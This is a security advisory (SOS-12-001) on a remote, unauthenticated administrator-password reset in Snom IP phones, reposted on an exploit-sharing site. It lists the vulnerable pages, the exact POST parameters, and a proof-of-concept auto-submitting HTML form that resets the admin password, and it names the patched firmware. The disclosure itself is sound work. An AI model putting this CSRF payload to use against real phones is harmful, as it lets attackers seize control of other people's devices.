0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Snom IP Phone Privilege Escalation - Security Advisory - SOS-12-001
Snom IP Phone Privilege Escalation - Security Advisory - SOS-12-001 Product. Snom IP Phone series Platform. Hardware Affected versions. All versions prior to v8.4.35 Severity Rating. High Impact. Privilege escalation Attack Vector. Remote without authentication Solution Status. Vendor patch CVE reference. CVE - not yet assigned Details. The privilege escalation is possible because the form used to login as the admin user is the same form for resetting the admin password, and the user is not required to enter their old password when changing their password. This form is also vulnerable to Cross-Site Request Forgery (CSRF). This issue is exploitable on the following pages: Version 7, 8: http://x.x.x.x/advanced_network.htm Version 6 and below: http://x.x.x.x/advanced.htm Where an attacker can reset the Administrator password by removing all password attempt variables and adding the following POST data: admin_mode=on admin_mode_password=newpass admin_mode_password_confirm=newpass Settings=Save hidden_tag=(leave as the current post variable if CSRF protection is enabled in firmware versions 7.1.33 and above) After sending the request the attacker can now login as the Administrator with the credentials specified in the above request. Proof of Concept. <?php echo htmlentities('<html> <head></head> <body onLoad=javascript:document.form.submit()> <form action=" http://x.x.x.x/advanced_network.htm" name="form" method="POST"> <input type="text" name="admin_mode" value="on"> <input type="text" name="admin_mode_password" value="newpass"> <input type="text" name="admin_mode_password_confirm" value="newpass"> <input type="text" name="Settings" value="save"> </form> </body><br> </html>'); ?> Solution. Download the latest firmware version 8.4.35 for the Snom phone from: http://wiki.snom.com/Firmware Discovered by. Nathaniel Carew from Sense of Security Labs. About us. Sense of Security is a leading provider of information security and risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the country's largest organisations. # 0day.today [2024-12-25] #